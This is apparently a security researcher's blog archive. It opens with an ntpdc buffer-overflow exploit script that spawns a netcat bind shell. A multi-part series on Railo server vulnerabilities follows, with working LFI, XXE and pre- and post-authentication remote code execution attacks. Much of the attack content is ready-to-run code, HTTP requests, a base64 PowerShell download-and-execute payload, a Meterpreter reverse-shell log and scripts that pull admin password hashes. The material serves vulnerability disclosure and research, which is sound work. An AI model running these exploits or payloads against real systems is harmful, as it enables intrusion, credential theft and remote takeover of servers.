Overall, this was quite a bit of fun. Although ASLR/PIE still poses an issue, this is a local bug that brute forcing and a little investigation can’t take care of. NX/RELRO/Canary/SSP/ASCII Armor have all been successfully neutralized. I hacked up a PoC that should work on Ubuntu boxes as configured, but it brute forces offsets. Test runs show it can take up to 2 hours to successfully pop a box. Full code can be found below.

from os import system, environ
from struct import pack
import sys

#
# ntpdc 4.2.6p3 bof
# @dronesec
# tested on x86 Ubuntu 12.04.5 LTS
#

IMAGE_BASE = 0x80000000
LD_INITIAL_OFFSET = 8900
LD_TAIL_OFFSET = 1400

sploit = "\x41" * 485        # junk 
sploit += pack("<I", IMAGE_BASE + 0x000143e0) # eip
sploit += "\x41" * 79        # junk 
sploit += pack("<I", IMAGE_BASE + 0x0002678d) # location -0x14/-0x318 from shellcode

ld_pl = ""
ld_pl += pack("<I", 0xeeffffff) # ESI
ld_pl += pack("<I", 0x11366061) # EDI
ld_pl += pack("<I", 0x41414141) # EBP
ld_pl += pack("<I", IMAGE_BASE + 0x000138f2) # ADD EDI, ESI; RET
ld_pl += pack("<I", IMAGE_BASE + 0x00022073) # CALL EDI
ld_pl += pack("<I", 0xbffff60d) # payload addr based on empty env; probably wrong

environ["EGG"] = "/bin/nc -lp 5544 -e /bin/sh"

for idx in xrange(200):

    for inc in xrange(200):

        # rebuild the payload each attempt so the padding doesn't accumulate;
        # layout mirrors the manual exploit: front junk, ROP block, tail junk
        attempt = "\x41" * (LD_INITIAL_OFFSET + idx)
        attempt += ld_pl
        attempt += "\x43" * (LD_TAIL_OFFSET + inc)

        environ["LD_PRELOAD"] = attempt
        system("echo %s | ntpdc 2>&1" % sploit)

railo security - part four - pre-auth remote code execution

27 August 2014 at 21:00

Part one – intro
Part two – post-auth rce
Part three – pre-auth password retrieval
Part four – pre-auth remote code execution

This post concludes our deep dive into the Railo application server by detailing not only one, but two pre-auth remote code execution vulnerabilities. If you’ve skipped the first three parts of this blog post to get to the juicy stuff, I don’t blame you, but I do recommend going back and reading them; there’s some important information and details back there. In this post, we’ll be documenting both vulnerabilities from start to finish, along with some demonstrations and notes on clusterd’s implementation on one of these.

The first RCE vulnerability affects versions 4.1 and 4.2.x of Railo, 4.2.1 being the latest release. Our vulnerability begins with the file thumbnail.cfm, which Railo uses to store admin thumbnails as static content on the server. As previously noted, Railo relies on authentication measures via the cfadmin tag, and thus none of the cfm files actually contain authentication routines themselves.

thumbnail.cfm first generates a hash of the image along with its width and height:

<cfset url.img=trim(url.img)>
<cfset id=hash(url.img&"-"&url.width&"-"&url.height)>
<cfset mimetypes={png:'png',gif:'gif',jpg:'jpeg'}>

Once it’s got a hash, it checks if the file exists, and if not, attempts to read and write it down:

<cffile action="readbinary" file="#url.img#" variable="data">
<cfimage action="read" source="#data#" name="img">

<!--- shrink images if needed --->
<cfif img.height GT url.height or img.width GT url.width>
    <cfif img.height GT url.height >
        <cfimage action="resize" source="#img#" height="#url.height#" name="img">
    </cfif>
    <cfif img.width GT url.width>
        <cfimage action="resize" source="#img#" width="#url.width#" name="img">
    </cfif>
    <cfset data=toBinary(img)>
</cfif>

The cffile tag is used to read the raw image and then cast it via the cfimage tag. The wonderful thing about cffile is that we can provide URLs that it will arbitrarily retrieve. So, our URL can be this:

192.168.1.219:8888/railo-context/admin/thumbnail.cfm?img=http://192.168.1.97:8000/my_image.png&width=5000&height=50000

And Railo will go and fetch the image and cast it. Note that if a height and width are not provided it will attempt to resize it; we don’t want this, and thus we provide large width and height values. This file is written out to /railo/temp/admin-ext-thumbnails/[HASH].[EXTENSION].

We’ve now successfully written a file onto the remote system, and need a way to retrieve it. The temp folder is not accessible from the web root, so we need some sort of LFI to fetch it. Enter jsloader.cfc.

jsloader.cfc is a Railo component used to fetch and load Javascript files. In this file is a CF tag called get, which accepts a single argument, lib, that it will read and return. We can use this to fetch arbitrary Javascript files on the system and load them onto the page. Note that it MUST be a Javascript file, as the extension is hard-coded into the file and null bytes don't work here, like they would in PHP. Here's the relevant code:

<cfset var filePath = expandPath('js/#arguments.lib#.js')/>
    <cfset var local = {result=""} /><cfcontent type="text/javascript">
        <cfsavecontent variable="local.result">
            <cfif fileExists(filePath)>
                <cfinclude template="js/#arguments.lib#.js"/>
            </cfif>
        </cfsavecontent>
    <cfreturn local.result />

Let’s tie all this together. Using thumbnail.cfm, we can write well-formed images to the file system, and using the jsloader.cfc file, we can read arbitrary Javascript. Recall how log injection works with PHP; we can inject PHP tags into arbitrary files so long as the file is loaded by PHP, and parsed accordingly. We can fill a file full of junk, but if the parser has its way a single <?phpinfo();?> will be discovered and executed; the CFML engine works the same way.

Our attack becomes much more clear: we generate a well-formed PNG file, embed CFML code into the image (metadata), set the extension to .js, and write it via thumbnail.cfm. We then retrieve the file via jsloader.cfc and, because we’re loading it with a CFM file, it will be parsed and executed. Let’s check this out:

$ ./clusterd.py -i 192.168.1.219 -a railo -v4.1 --deploy ./src/lib/resources/cmd.cfml --deployer jsload

        clusterd/0.3.1 - clustered attack toolkit
            [Supporting 6 platforms]

 [2014-06-15 03:39PM] Started at 2014-06-15 03:39PM
 [2014-06-15 03:39PM] Servers' OS hinted at windows
 [2014-06-15 03:39PM] Fingerprinting host '192.168.1.219'
 [2014-06-15 03:39PM] Server hinted at 'railo'
 [2014-06-15 03:39PM] Checking railo version 4.1 Railo Server...
 [2014-06-15 03:39PM] Checking railo version 4.1 Railo Server Administrator...
 [2014-06-15 03:39PM] Checking railo version 4.1 Railo Web Administrator...
 [2014-06-15 03:39PM] Matched 2 fingerprints for service railo
 [2014-06-15 03:39PM]   Railo Server Administrator (version 4.1)
 [2014-06-15 03:39PM]   Railo Web Administrator (version 4.1)
 [2014-06-15 03:39PM] Fingerprinting completed.
 [2014-06-15 03:39PM] This deployer (jsload_lfi) requires an external listening port (8000).  Continue? [Y/n] > 
 [2014-06-15 03:39PM] Preparing to deploy cmd.cfml...
 [2014-06-15 03:40PM] Waiting for remote server to download file [5s]]
 [2014-06-15 03:40PM] Invoking stager and deploying payload...
 [2014-06-15 03:40PM] Waiting for remote server to download file [7s]]
 [2014-06-15 03:40PM] cmd.cfml deployed at /railo-context/cmd.cfml
 [2014-06-15 03:40PM] Finished at 2014-06-15 03:40PM

A couple of things to note: as you may notice, the module currently requires the Railo server to connect back twice; once for the image with the embedded CFML, and a second time for the payload. We embed only a stager in the image, which then connects back for the actual payload.
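Under the hood, the module boils down to two requests. A rough sketch follows; the jsloader.cfc path, its invocation syntax, and the traversal depth are assumptions based on the description above, and [HASH] is a placeholder that must be recovered separately:

import requests

base = "http://192.168.1.219:8888/railo-context"

# 1) Railo fetches our PNG (CFML hidden in the metadata, served with a .js
#    extension) and writes it to admin-ext-thumbnails/[HASH].js
requests.get(base + "/admin/thumbnail.cfm", params={
    "img": "http://192.168.1.97:8000/payload.js",
    "width": "5000", "height": "50000",
})

# 2) jsloader.cfc's get() appends ".js" itself, so lib traverses to the
#    cached file without an extension (path below is hypothetical)
resp = requests.get(base + "/admin/ext/jsloader.cfc", params={
    "method": "get",
    "lib": "../../admin-ext-thumbnails/[HASH]",
})
print resp.text  # output of the executed CFML stager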

Sadly, the LFI was unknowingly killed in 4.2.1 with the following fix to jsloader.cfc:

<cfif arguments.lib CT "..">
    <cfheader statuscode="400">
    <cfreturn "// 400 - Bad Request">
</cfif>

The arguments.lib variable contains our controllable path, but this check kills our ability to traverse out. Unfortunately, we can’t substitute the .. with Unicode or UTF-16 due to the way Jetty and Java are configured by default. This file is pretty much useless to us now, unless we can write into the folder that jsloader.cfc reads from; then we don’t need to traverse out at all.

We can still pop this on Express installs, due to the Jetty LFI discussed in part 3. By simply traversing into the extensions folder, we can load up the Javascript file and execute our shell. Railo installs still prove elusive.

buuuuuuuuuuuuuuuuuuuuuuuuut

Recall the img.cfm LFI from part 3; by tip-toeing back into the admin-ext-thumbnails folder, we can summon our vulnerable image and execute whatever ColdFusion markup we shove into it. This proves to be an even better choice than jsloader.cfc, as we don’t need to traverse as far. This bug only affects versions 4.1 – 4.2.1, as thumbnail.cfm wasn’t added until 4.1. CVE-2014-5468 has been assigned to this issue.

The second RCE vulnerability is a bit easier and has a larger attack vector, spanning all versions of Railo. As previously noted, Railo does not do per page/URL authentication, but rather enforces it when making changes via the <cfadmin> tag. Due to this, any pages doing naughty things without checking with the tag may be exploitable, as previously seen. Another such file is overview.uploadNewLangFile.cfm:

<cfif structKeyExists(form, "newLangFile")>
    <cftry>
        <cffile action="UPLOAD" filefield="form.newLangFile" destination="#expandPath('resources/language/')#" nameconflict="ERROR">
        <cfcatch>
            <cfthrow message="#stText.overview.langAlreadyExists#">
        </cfcatch>
    </cftry>
    <cfset sFile = expandPath("resources/language/" & cffile.serverfile)>
    <cffile action="READ" file="#sFile#" variable="sContent">
    <cftry>
        <cfset sXML     = XMLParse(sContent)>
        <cfset sLang    = sXML.language.XMLAttributes.label>
        <cfset stInLang = GetFromXMLNode(sXML.XMLRoot.XMLChildren)>
        <cfcatch>
            <cfthrow message="#stText.overview.ErrorWhileReadingLangFile#">
        </cfcatch>
    </cftry>

I mean, this might as well be an upload form to write arbitrary files. It’s stupid simple to get arbitrary data written to the system:

POST /railo-context/admin/overview.uploadNewLangFile.cfm HTTP/1.1
Host: localhost:8888
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0 Iceweasel/18.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:8888/railo-context/admin/server.cfm
Connection: keep-alive
Content-Type: multipart/form-data; boundary=AaB03x
Content-Length: 140

--AaB03x
Content-Disposition: form-data; name="newLangFile"; filename="xxxxxxxxx.lang"
Content-Type: text/plain

thisisatest
--AaB03x--

The tricky bit is where it’s written to; Railo uses a compression system that dynamically generates compressed versions of the web server, contained within railo-context.ra. A mirror of these can be found under the following:

[ROOT]\webapps\ROOT\WEB-INF\railo\temp\compress

The compressed data is then obfuscated behind two more folders, both named with MD5 hashes. In my example, it becomes:

[ROOT]\webapps\ROOT\WEB-INF\railo\temp\compress\88d817d1b3c2c6d65e50308ef88e579c\0bdbf4d66d61a71378f032ce338258f2

So we cannot simply traverse into this path, as the hashes change every single time a file is added, removed, or modified. I’ll walk through the logic used to generate these but, as a precursor, we aren’t going to figure these out without some other fashionable info disclosure bug.

The hashes are calculated in railo-java/railo-core/src/railo/commons/io/res/type/compress/Compress.java:

temp=temp.getRealResource("compress");                
temp=temp.getRealResource(MD5.getDigestAsString(cid+"-"+ffile.getAbsolutePath()));
if(!temp.exists())temp.createDirectory(true);
}
catch(Throwable t){}
}

    if(temp!=null) {
        String name=Caster.toString(actLastMod)+":"+Caster.toString(ffile.length());
        name=MD5.getDigestAsString(name,name);
        root=temp.getRealResource(name);
        if(actLastMod>0 && root.exists()) return;

The first hash is then cid + "-" + ffile.getAbsolutePath(), where cid is the randomly generated ID found in the id file (see part two) and ffile.getAbsolutePath() is the full path to the classes resource. This is doable if we have the XXE, but on 4.1+ that’s inaccessible.

The second hash is actLastMod + ":" + ffile.length(), where actLastMod is the last modified time of the file and ffile.length() is the obvious file length. Again, this is likely not brute-forceable without a serious infoleak vulnerability. Hosts <= 4.0 are exploitable, as we can list files with the XXE via the following:

bryan@debdev:~/tools/clusterd$ python http_test_xxe.py 
88d817d1b3c2c6d65e50308ef88e579c

[SNIP - in which we modify the path to include ^]

bryan@debdev:~/tools/clusterd$ python http_test_xxe.py
0bdbf4d66d61a71378f032ce338258f2

[SNIP - in which we modify the path to include ^]

bryan@debdev:~/tools/clusterd$ python http_test_xxe.py
admin
admin_cfc$cf.class
admin_cfm$cf.class
application_cfc$cf.class
application_cfm$cf.class
component_cfc$cf.class
component_dump_cfm450$cf.class
doc
doc_cfm$cf.class
form_cfm$cf.class
gateway
graph_cfm$cf.class
jquery_blockui_js_cfm1012$cf.class
jquery_js_cfm322$cf.class
META-INF
railo_applet_cfm270$cf.class
res
templates
wddx_cfm$cf.class

http_test_xxe.py is just a small hack I wrote to exploit the XXE, with which we eventually obtain both valid hashes. So we can exploit this in versions <= 4.0 Express. Later versions, as far as I can find, have no discernible way of obtaining full RCE without another infoleak or resorting to a slow, loud, painful death of brute-forcing two MD5 hashes.
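For reference, reproducing the two directory names once the inputs leak takes only a few lines; a sketch following the Compress.java logic above (treating actLastMod as Java’s millisecond lastModified() value, which is an assumption):

import hashlib

def compress_dirs(cid, abs_path, last_mod, length):
    # outer folder: md5(cid + "-" + absolute path of the resource)
    outer = hashlib.md5("%s-%s" % (cid, abs_path)).hexdigest()
    # inner folder: md5(lastModified + ":" + file length)
    inner = hashlib.md5("%s:%s" % (last_mod, length)).hexdigest()
    return outer, inner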

The first RCE is currently available in clusterd dev, and a PR is being made to Metasploit thanks to @BrandonPrry. Hopefully it can be merged shortly.

As we conclude our Railo analysis, let’s quickly recap the vulnerabilities discovered during this audit:

Version 4.2:
    - Pre-authentication LFI via `img.cfm` (Install/Express)
    - Pre-authentication LFI via Jetty CVE (Express)
    - Pre-authentication RCE via `img.cfm` and `thumbnail.cfm` (Install/Express)
    - Pre-authentication RCE via `jsloader.cfc` and `thumbnail.cfm` (Install/Express) (Up to version 4.2.0)
Version 4.1:
    - Pre-authentication LFI via `img.cfm` (Install/Express)
    - Pre-authentication LFI via Jetty CVE (Express)
    - Pre-authentication RCE via `img.cfm` and `thumbnail.cfm` (Install/Express)
    - Pre-authentication RCE via `jsloader.cfc` and `thumbnail.cfm` (Install/Express)
Version 4.0:
    - Pre-authentication LFI via XXE (Install/Express)
    - Pre-authentication LFI via Jetty CVE (Express)
    - Pre-authentication LFI via `img.cfm` (Install/Express)
    - Pre-authentication RCE via XXE and `overview.uploadNewLangFile` (Install/Express)
    - Pre-authentication RCE via `jsloader.cfc` and `thumbnail.cfm` (Install/Express)
    - Pre-authentication RCE via `img.cfm` and `thumbnail.cfm` (Install/Express)
Version 3.x:
    - Pre-authentication LFI via `img.cfm` (Install/Express)
    - Pre-authentication LFI via Jetty CVE (Express)
    - Pre-authentication LFI via XXE (Install/Express)
    - Pre-authentication RCE via XXE and `overview.uploadNewLangFile` (Express)

This does not include the random XSS bugs or post-authentication issues. At the end of it all, this appears to be a framework with great ideas, but desperately in need of code TLC. Driving forward with a checklist of features may look nice on a README page, but the desolate wasteland of code left behind can be a scary thing. Hopefully the Railo guys take note and spend some serious time evaluating and improving existing code. The bugs found during this series have been disclosed to the developers; here’s to hoping they follow through.

railo security - part three - pre-authentication LFI

23 August 2014 at 21:00

Part one – intro
Part two – post-authentication rce
Part three – pre-authentication LFI
Part four – pre-authentication rce

This post continues our four part Railo security analysis with three pre-authentication LFI vulnerabilities. These allow anonymous users access to retrieve the administrative plaintext password and login to the server’s administrative interfaces. If you’re unfamiliar with Railo, I recommend at the very least reading part one of this series. The most significant LFI discussed has been implemented as auxiliary modules in clusterd, though they’re pretty trivial to exploit on their own.

We’ll kick this portion off by introducing a pre-authentication LFI vulnerability that affects all versions of Railo Express; if you’re unfamiliar with the Express install, it’s really just a self-contained, no-installation-necessary package that harnesses Jetty to host the service. The flaw actually has nothing to do with Railo itself, but rather lies in this packaged web server, Jetty. CVE-2007-6672 addresses this issue, but it appears that the Railo folks have not bothered to update this. Via the browser, we can pull the config file, complete with the admin hash, with http://[host]:8888/railo-context/admin/..\..\railo-web.xml.cfm.
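Exploiting this by hand is a one-liner; a minimal sketch with requests, with the backslashes percent-encoded so nothing along the way normalizes them:

import requests

# CVE-2007-6672: Jetty serves files above the context via ..\..\ traversal
url = ("http://192.168.1.219:8888/railo-context/admin/"
       "..%5C..%5Crailo-web.xml.cfm")
print requests.get(url).text  # contains the pw/password attribute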

A quick run of this in clusterd on Railo 4.0:

$ ./clusterd.py -i 192.168.1.219 -a railo -v4.0 --rl-pw

        clusterd/0.3 - clustered attack toolkit
            [Supporting 6 platforms]

 [2014-05-15 06:25PM] Started at 2014-05-15 06:25PM
 [2014-05-15 06:25PM] Servers' OS hinted at windows
 [2014-05-15 06:25PM] Fingerprinting host '192.168.1.219'
 [2014-05-15 06:25PM] Server hinted at 'railo'
 [2014-05-15 06:25PM] Checking railo version 4.0 Railo Server...
 [2014-05-15 06:25PM] Checking railo version 4.0 Railo Server Administrator...
 [2014-05-15 06:25PM] Checking railo version 4.0 Railo Web Administrator...
 [2014-05-15 06:25PM] Matched 3 fingerprints for service railo
 [2014-05-15 06:25PM]   Railo Server (version 4.0)
 [2014-05-15 06:25PM]   Railo Server Administrator (version 4.0)
 [2014-05-15 06:25PM]   Railo Web Administrator (version 4.0)
 [2014-05-15 06:25PM] Fingerprinting completed.
 [2014-05-15 06:25PM] Attempting to pull password...
 [2014-05-15 06:25PM] Fetched encrypted password, decrypting...
 [2014-05-15 06:25PM] Decrypted password: default
 [2014-05-15 06:25PM] Finished at 2014-05-15 06:25PM

and on the latest release of Railo, 4.2:

$ ./clusterd.py -i 192.168.1.219 -a railo -v4.2 --rl-pw

        clusterd/0.3 - clustered attack toolkit
            [Supporting 6 platforms]

 [2014-05-15 06:28PM] Started at 2014-05-15 06:28PM
 [2014-05-15 06:28PM] Servers' OS hinted at windows
 [2014-05-15 06:28PM] Fingerprinting host '192.168.1.219'
 [2014-05-15 06:28PM] Server hinted at 'railo'
 [2014-05-15 06:28PM] Checking railo version 4.2 Railo Server...
 [2014-05-15 06:28PM] Checking railo version 4.2 Railo Server Administrator...
 [2014-05-15 06:28PM] Checking railo version 4.2 Railo Web Administrator...
 [2014-05-15 06:28PM] Matched 3 fingerprints for service railo
 [2014-05-15 06:28PM]   Railo Server (version 4.2)
 [2014-05-15 06:28PM]   Railo Server Administrator (version 4.2)
 [2014-05-15 06:28PM]   Railo Web Administrator (version 4.2)
 [2014-05-15 06:28PM] Fingerprinting completed.
 [2014-05-15 06:28PM] Attempting to pull password...
 [2014-05-15 06:28PM] Fetched password hash: d34535cb71909c4821babec3396474d35a978948455a3284fd4e1bc9c547f58b
 [2014-05-15 06:28PM] Finished at 2014-05-15 06:28PM

Using this LFI, we can pull the railo-web.xml.cfm file, which contains the administrative password. Notice that 4.2 only dumps a hash, whilst 4.0 dumps a plaintext password. This is because versions <= 4.0 Blowfish-encrypt the password, while versions > 4.0 actually hash it. Here’s the relevant code from Railo (ConfigWebFactory.java):

private static void loadRailoConfig(ConfigServerImpl configServer, ConfigImpl config, Document doc) throws IOException  {
        Element railoConfiguration = doc.getDocumentElement();

        // password
        String hpw=railoConfiguration.getAttribute("pw");
        if(StringUtil.isEmpty(hpw)) {
            // old password type
            String pwEnc = railoConfiguration.getAttribute("password"); // encrypted password (reversable)
            if (!StringUtil.isEmpty(pwEnc)) {
                String pwDec = new BlowfishEasy("tpwisgh").decryptString(pwEnc);
                hpw=hash(pwDec);
            }
        }
        if(!StringUtil.isEmpty(hpw))
            config.setPassword(hpw);
        else if (configServer != null) {
            config.setPassword(configServer.getDefaultPassword());
        }

As above, they actually encrypted the password using a hard-coded symmetric key; this is where versions <= 4.0 stop. In > 4.0, after decryption they hash the password (SHA256) and use that instead. Note that in > 4.0 the stored value is no longer a reversible ciphertext of the actual password, so we cannot simply decrypt it to use and abuse.

Due to the configuration of the web server, we can only pull CFM files; this is fine for the configuration file, but system files prove troublesome…

The second LFI is a trivial XXE that affects versions <= 4.0, and is exploitable out-of-the-box with Metasploit. Unlike the Jetty LFI, this affects both editions of Railo, installed and Express:

Using this we cannot pull railo-web.xml.cfm because it contains XML headers, and we cannot use the standard OOB methods for retrieving files. Timothy Morgan gave a great talk at OWASP AppSec 2013 that detailed a neat way of abusing Java XML parsers to obtain RCE via XXE. The process is pretty interesting: if you submit a URL with a jar:// protocol handler, the server will download the zip/jar to a temporary location, perform some header parsing, and then delete it. However, if you push the file and leave the connection open, the file will persist. This vector, combined with one of the other LFIs, could be a reliable pre-authentication RCE, but I was unable to get it working.

The third LFI is just as trivial as the first two, and again stems from the pandemic problem of failing to authenticate at the URL/page level. img.cfm is a file used to, you guessed it, pull images from the system for display. Unfortunately, it fails to sanitize anything:

<cfset path="resources/img/#attributes.src#.cfm">
<cfparam name="application.adminimages" default="#{}#">
<cfif StructKeyExists(application.adminimages,path) and false>
    <cfset str=application.adminimages[path]>
<cfelse>
    <cfsavecontent variable="str" trim><cfinclude template="#path#"></cfsavecontent>
    <cfset application.adminimages[path]=str>
</cfif>

By fetching this page with attributes.src set to another CFM file elsewhere, we can load the file and execute any tags contained therein. As we’ve done above, let’s grab railo-web.xml.cfm; we can do this with the following URL: http://host:8888/railo-context/admin/img.cfm?attributes.src=../../../../railo-web.xml&thistag.executionmode=start which simply returns

<?xml version="1.0" encoding="UTF-8"?><railo-configuration pw="d34535cb71909c4821babec3396474d35a978948455a3284fd4e1bc9c547f58b" version="4.2">

This vulnerability exists in 3.3 – 4.2.1 (latest), and is exploitable out-of-the-box on both Railo installed and Express editions. Though you can only pull CFM files, the configuration file dumps plenty of juicy information. It may also be beneficial for custom tags, plugins, and custom applications that may house other vulnerable/sensitive information hidden away from the URL.
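Scripting the pull is just as trivial; a minimal sketch using the URL above, with a regex for the pw attribute (on <= 4.0, look for the encrypted password attribute instead):

import re
import requests

url = ("http://192.168.1.219:8888/railo-context/admin/img.cfm"
       "?attributes.src=../../../../railo-web.xml"
       "&thistag.executionmode=start")
body = requests.get(url).text
match = re.search(r'pw="([0-9a-f]+)"', body)
if match:
    print "admin hash: %s" % match.group(1)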

Curiously, at first glance it looks like it may be possible to turn this LFI into an RFI. Unfortunately it’s not quite that simple; if we attempt to access a non-existent file, we see the following:

The error occurred in zip://C:\Documents and Settings\bryan\My Documents\Downloads\railo\railo-express-4.2.1.000-jre-win32\webapps\ROOT\WEB-INF\railo\context\railo-context.ra!/admin/img.cfm: line 29

Notice the zip:// handler. This prevents us from injecting a path to a remote host with any other handler. If, however, the tag looked like this:

<cfinclude>#attributes.src#</cfinclude>

Then it would have been trivially exploitable via RFI. As it stands, it’s not possible to modify the handler without prior code execution.

To sum up the LFIs: all versions and all installs are vulnerable via the img.cfm vector. All versions of the Express edition are vulnerable via the Jetty LFI. Versions <= 4.0, in all installs, are vulnerable to the XXE vector. This gives us reliable LFI in all current versions of Railo.

This concludes our pre-authentication LFI portion of this assessment, which will crescendo with our final post detailing several pre-authentication RCE vulnerabilities. I expect a quick turnaround for part four, and hope to have it out in a few days. Stay tuned!

railo security - part two - post-authentication rce

24 July 2014 at 21:10

Part one – intro
Part two – post-authentication rce
Part three – pre-authentication lfi
Part four – pre-authentication rce

This post continues our dive into Railo security, this time introducing several post-authentication RCE vulnerabilities discovered in the platform. As stated in part one of this series, Railo, like ColdFusion, has a task scheduler that allows authenticated users to write local files. While this feature makes it the standard way to shell a Railo box, sometimes it may not work; in the event of stringent firewall rules or irregular file permissions, or if you’d just prefer not to make remote connections, the techniques explored in this post will help.

PHP has an interesting, ahem, feature, where it writes out session information to a temporary file located in a designated path. If accessible to an attacker, this file can be used to inject PHP data into, via multiple different vectors such as a User-Agent or some function of the application itself. Railo does sort of the same thing for its Web and Server interfaces, except these files are always stored in a predictable location. Unlike PHP, however, the name of the file is not simply the session ID, but is rather a quasi-unique value generated using a mixture of pseudo-random and predictable/leaked information. I’ll dive into this in a bit.

When a change to the interface is made, or a new page bookmark is created, Railo writes this information out to a session file located at /admin/userdata/. The file is either created or, if one already exists, reused, and will be named either web-[value].cfm or server-[value].cfm depending on the interface you’re coming in from. It’s important to note the extension on these files; because of the CFM extension, they will be parsed by the CFML interpreter looking for CF tags, much like PHP would do. A typical request to add a new bookmark is as follows:

GET /railo-context/admin/web.cfm?action=internal.savedata&action2=addfavorite&favorite=server.request HTTP/1.1

The favorite server.request is then written out to a JSON-encoded array object in the session file, as below:

{'fullscreen':'true','contentwidth':'1267','favorites':{'server.request':''}}

The next question is then obvious: what if we inject something malicious as a favorite?

GET /railo-context/admin/web.cfm?action=internal.savedata&action2=addfavorite&favorite=<cfoutput><cfexecute name="c:\windows\system32\cmd.exe" arguments="/c dir" timeout="10" variable="output"></cfexecute><pre>#output#</pre></cfoutput> HTTP/1.1

Our session file will then read:

{'fullscreen':'true','contentwidth':'1267','favorites':{'<cfoutput><cfexecute name="c:\windows\system32\cmd.exe" arguments="/c dir" timeout="10" variable="output"></cfexecute><pre>##output##</pre></cfoutput>':'','server.charset':''}}

Whilst our injected data is written to the file, astute readers will note the double # around our ColdFusion variable. This is ColdFusion’s way of escaping a number sign, and it will therefore not reflect our command output back into the page. To my knowledge, there is no way to obtain shell output without the use of the variable tags.

We have two options for popping this: inject a command to return a shell or inject a web shell that simply writes output to a file that is then accessible from the web root. I’ll start with the easiest of the two, which is injecting a command to return a shell.

I’ll use PowerSploit’s Invoke-Shellcode script and inject a Meterpreter shell into the Railo process. Because Railo will also quote our single/double quotes, we need to base64 the Invoke-Expression payload:

GET /railo-context/admin/web.cfm?action=internal.savedata&action2=addfavorite&favorite=%3A%3Ccfoutput%3E%3Ccfexecute%20name%3D%22c%3A%5Cwindows%5Csystem32%5Ccmd.exe%22%20arguments%3D%22%2Fc%20PowerShell.exe%20-Exec%20ByPass%20-Nol%20-Enc%20aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADEALgA2ADoAOAAwADAAMAAvAEkAbgB2AG8AawBlAC0AUwBoAGUAbABsAGMAbwBkAGUALgBwAHMAMQAnACkA%22%20timeout%3D%2210%22%20variable%3D%22output%22%3E%3C%2Fcfexecute%3E%3C%2Fcfoutput%3E%27 HTTP/1.1
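For reference, PowerShell’s -Enc flag takes the base64 of a UTF-16LE string; the blob in the request above decodes to a download-and-execute one-liner and can be regenerated like so:

import base64

# Build the -Enc argument: base64 of the UTF-16LE encoded command
cmd = ("iex (New-Object Net.WebClient).DownloadString("
       "'http://192.168.1.6:8000/Invoke-Shellcode.ps1')")
print base64.b64encode(cmd.encode('utf-16-le'))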

Once injected, we hit our session page and pop a shell:

payload => windows/meterpreter/reverse_https
LHOST => 192.168.1.6
LPORT => 4444
[*] Started HTTPS reverse handler on https://0.0.0.0:4444/
[*] Starting the payload handler...
[*] 192.168.1.102:50122 Request received for /INITM...
[*] 192.168.1.102:50122 Staging connection for target /INITM received...
[*] Patched user-agent at offset 663128...
[*] Patched transport at offset 662792...
[*] Patched URL at offset 662856...
[*] Patched Expiration Timeout at offset 663728...
[*] Patched Communication Timeout at offset 663732...
[*] Meterpreter session 1 opened (192.168.1.6:4444 -> 192.168.1.102:50122) at 2014-03-24 00:44:20 -0600

meterpreter > getpid
Current pid: 5064
meterpreter > getuid
Server username: bryan-PC\bryan
meterpreter > sysinfo
Computer        : BRYAN-PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64 (Current Process is WOW64)
System Language : en_US
Meterpreter     : x86/win32
meterpreter > 

Because I’m using PowerShell, this method won’t work on Windows XP or Linux systems, but it’s trivial to use the next method for that (net user/useradd).

The second method is to simply write out the result of a command into a file and then retrieve it. This can trivially be done with the following:

':<cfoutput><cfexecute name="c:\windows\system32\cmd.exe" arguments="/c dir > ./webapps/www/WEB-INF/railo/context/output.cfm" timeout="10" variable="output"></cfexecute></cfoutput>'

Note that we’re writing out to the start of the web root and that our output file is a CFM; this is a requirement, as the web server won’t serve up flat files or .txt’s.

Great, we’ve verified this works. Now, how do we actually figure out what the hell this session file is called? As previously noted, the file is saved as either web-[VALUE].cfm or server-[VALUE].cfm, the prefix coming from the interface you’re accessing it from. I’m going to step through the code used for this, which happens to be a healthy mix of CFML and Java.

We’ll start by identifying the session file on my local Windows XP machine: web-a898c2525c001da402234da94f336d55.cfm. This is stored in www\WEB-INF\railo\context\admin\userdata, of which admin\userdata is accessible from the web root; that is, we can directly access this file by hitting railo-context/admin/userdata/[file] from the browser.

When a favorite is saved, internal.savedata.cfm is invoked and searches through the given list for the function we’re performing:

<cfif listFind("addfavorite,removefavorite", url.action2) and structKeyExists(url, "favorite")>
    <cfset application.adminfunctions[url.action2](url.favorite) />
        <cflocation url="?action=#url.favorite#" addtoken="no" />

This calls down into application.adminfunctions with the specified action and favorite-to-save. Our addfavorite function is as follows:

<cffunction name="addfavorite" returntype="void" output="no">
        <cfargument name="action" type="string" required="yes" />
        <cfset var data = getfavorites() />
        <cfset data[arguments.action] = "" />
        <cfset setdata('favorites', data) />
    </cffunction>

Tunneling yet deeper into the rabbit hole, we move forward into setdata:

<cffunction name="setdata" returntype="void" output="no">
        <cfargument name="key" type="string" required="yes" />
        <cfargument name="value" type="any" required="yes" />
        <cflock name="setdata_admin" timeout="1" throwontimeout="no">
            <cfset var data = loadData() />
            <cfset data[arguments.key] = arguments.value />
            <cfset writeData() />
        </cflock>
    </cffunction>

This function actually reads in our data file, inserts our new favorite into the data array, and writes it back down. Our question is “how is the file named?”, so naturally we need to head into loadData:

 <cffunction name="loadData" access="private" output="no" returntype="any">
        <cfset var dataKey = getDataStoreName() />
            [..snip..]

And yet deeper we move, into getDataStoreName:

<cffunction name="getDataStoreName" access="private" output="no" returntype="string">
        <cfreturn "#request.admintype#-#getrailoid()[request.admintype].id#" />
    </cffunction>

At last we’ve reached the apparent event horizon of this XML black hole; we see the return will be of form web-#getrailoid()[web].id#, substituting in web for request.admintype.

I’ll skip some of the digging here, but let’s fast forward to Admin.java:

 private String getCallerId() throws IOException {
        if(type==TYPE_WEB) {
            return config.getId();
        }

Here we return the ID of the caller (our ID, for reference, is what we’re currently tracking down!), which calls down into config.getId:

   @Override
    public String getId() {
        if(id==null){
            id = getId(getSecurityKey(),getSecurityToken(),false,securityKey);
        }
